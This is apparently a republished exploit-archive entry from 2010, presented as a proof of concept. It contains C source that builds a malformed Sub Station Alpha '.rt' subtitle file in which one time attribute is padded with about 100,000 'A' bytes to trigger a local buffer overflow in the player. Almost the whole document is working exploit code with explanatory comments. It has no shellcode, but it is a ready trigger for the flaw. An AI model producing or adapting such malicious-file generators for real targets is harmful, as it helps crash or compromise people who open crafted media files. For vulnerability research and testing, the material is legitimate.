Sub Station Alpha v4.08 .rt file Local Buffer Overflow PoC
来源:flo_flow_supremacy[at]yahoo.com 作者:fl0_fl0w 发布时间:2010-01-18  

/*Sub Station Alpha v4.08 .rt file local buffer overflow poc
     by fl0 fl0w*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Name of the sample file written by buildf(); main() passes it as the argument. */
#define FIL3 "testfile.rt"
   /* Leading part of the generated .rt document, up to and including the
      opening quote of the first time-begin attribute (109 bytes, NUL excluded). */
   char header[] =
       "<window height=\"250\" width=\"300\" duration=\"15\" bgcolor=\"yellow\">\r\n"
       "Mary had a little lamb,\r\n"
       "<br/><time begin=\"";
   /* Trailing part of the generated .rt document: closes the attribute and
      element opened by header, adds a few more cues and closes the window
      (154 bytes, NUL excluded). */
   char tail[] =
       "\"/>\r\n"
       "<br/><time begin=\"6\"/>little lamb,\r\n"
       "<br/><time begin=\"9\"/>Mary had a little lamb\r\n"
       "<br/><time begin=\"12\"/>whose fleece was white as snow.\r\n"
       "</window>\r\n";
   /* Text printed once by main() before anything else happens. */
   char banner[] =
       "***********************************************************\n"
       "Sub Station Alpha v4.08 .rt file local buffer overflow poc*\n"
       "     by fl0 fl0w                                          *\n"
       "***********************************************************\n";
/*--------prototypes------*/ 
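   /* Forward declarations. buildf() is declared here as well because main()
      calls it before its definition; without a prototype that call is an
      implicit declaration, which C99 and later no longer allow. */
   int buildf(char *fname);
   int cpy(char *source, char *dest, int offset);
   int cpystr(char *dest, int str, int len, int offset);
   void print(char *msg);
   unsigned int getFsize(FILE *g, char *gname);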
/*-----global variables--------*/
   char b[1000000];     /* static storage, never obtained from malloc(); must not be passed to free() */
   char *size;          /* declared but not used anywhere in this file */
   char junk[1000000];  /* filler written to the output file; static, so zero-initialised and the
                           part main() fills with 0x41 stays NUL-terminated */
/*--------main---------------*/
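    /* Entry point: prints the banner, fills the first FILLER_LEN bytes of
       junk[] with 'A' (0x41) and writes the sample file named by FIL3, then
       waits for a line of input before returning 0 (presumably so a console
       window stays open long enough to read the output). */
    int main(void)
    {
        enum { FILLER_LEN = 99999 };   /* bytes of junk[] set to 'A'; the rest stays 0 */
        int buildf(char *fname);       /* defined later in the file; declared here so the call is not implicit */

        printf("%s", banner);
        print("Starting sploit");
        memset(junk, 'A', FILLER_LEN);
        buildf(FIL3);
        print("File done!");
        getchar();                     /* pause until input is available */
        return 0;
    }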
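  /* Writes header, the filler prepared in junk[] by main() and tail to the
     file named fname, prints the resulting file size and returns 0; returns
     -1 if the final fclose() reports an error. If the file cannot be opened
     a message is printed and the process exits with a failure status. */
  int buildf(char *fname)
  {
      FILE *fp = fopen(fname, "wb");

      if (fp == NULL) {
          print("File writing error");
          exit(EXIT_FAILURE);
      }
      fprintf(fp, "%s%s%s", header, junk, tail);
      /* getFsize() opens the file a second time, so data still sitting in
         fp's stdio buffer has to be flushed first or the size is under-reported. */
      fflush(fp);
      printf("[!]File is %u bytes", getFsize(fp, fname));
      /* b[] is a static array and was never allocated with malloc(), so it is
         not freed here (free() on it is undefined behaviour). */
      if (fclose(fp) != 0) {
          print("File writing error");
          return -1;
      }

      return 0;
  }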
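   /* Returns the size in bytes of the file named gname. The FILE* parameter
      is not used (kept only to match the existing prototype); the function
      opens its own read handle and closes it before returning. If the file
      cannot be opened, or seeking/telling fails, a message is printed and the
      process exits with a failure status. */
   unsigned int getFsize(FILE *g, char *gname)
   {
       (void)g;

       FILE *in = fopen(gname, "rb");
       if (in == NULL) {
           print("File error at reading");
           exit(EXIT_FAILURE);
       }
       long pos = -1;
       if (fseek(in, 0, SEEK_END) == 0) {
           pos = ftell(in);   /* -1 on error */
       }
       fclose(in);            /* the handle was leaked before; close it on every path */
       if (pos < 0) {
           print("File error at reading");
           exit(EXIT_FAILURE);
       }
       return (unsigned int)pos;
   }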
   /* Copies source, including its terminating NUL, into dest starting at byte
      offset and returns the number of characters copied (NUL excluded).
      dest must have room for offset + strlen(source) + 1 bytes; no bounds
      check is performed. */
   int cpy(char *source, char *dest, int offset)
   {
       size_t n = strlen(source);
       char *at = dest + offset;

       memcpy(at, source, n + 1);
       return (int)n;
   }
   /* Fills dest, starting at byte offset, with the byte value str and returns
      len. Note that len + 1 bytes are written, not len; the caller must size
      dest accordingly. */
   int cpystr(char *dest, int str, int len, int offset)
   {
       char *at = dest + offset;

       memset(at, str, len + 1);
       return len;
   }
   /* Prints msg as a status line on stdout: an empty line, then "[*]" followed
      by msg and a newline. */
   void print(char *msg)
   {
       fputs("\n[*]", stdout);
       puts(msg);
   }
            


 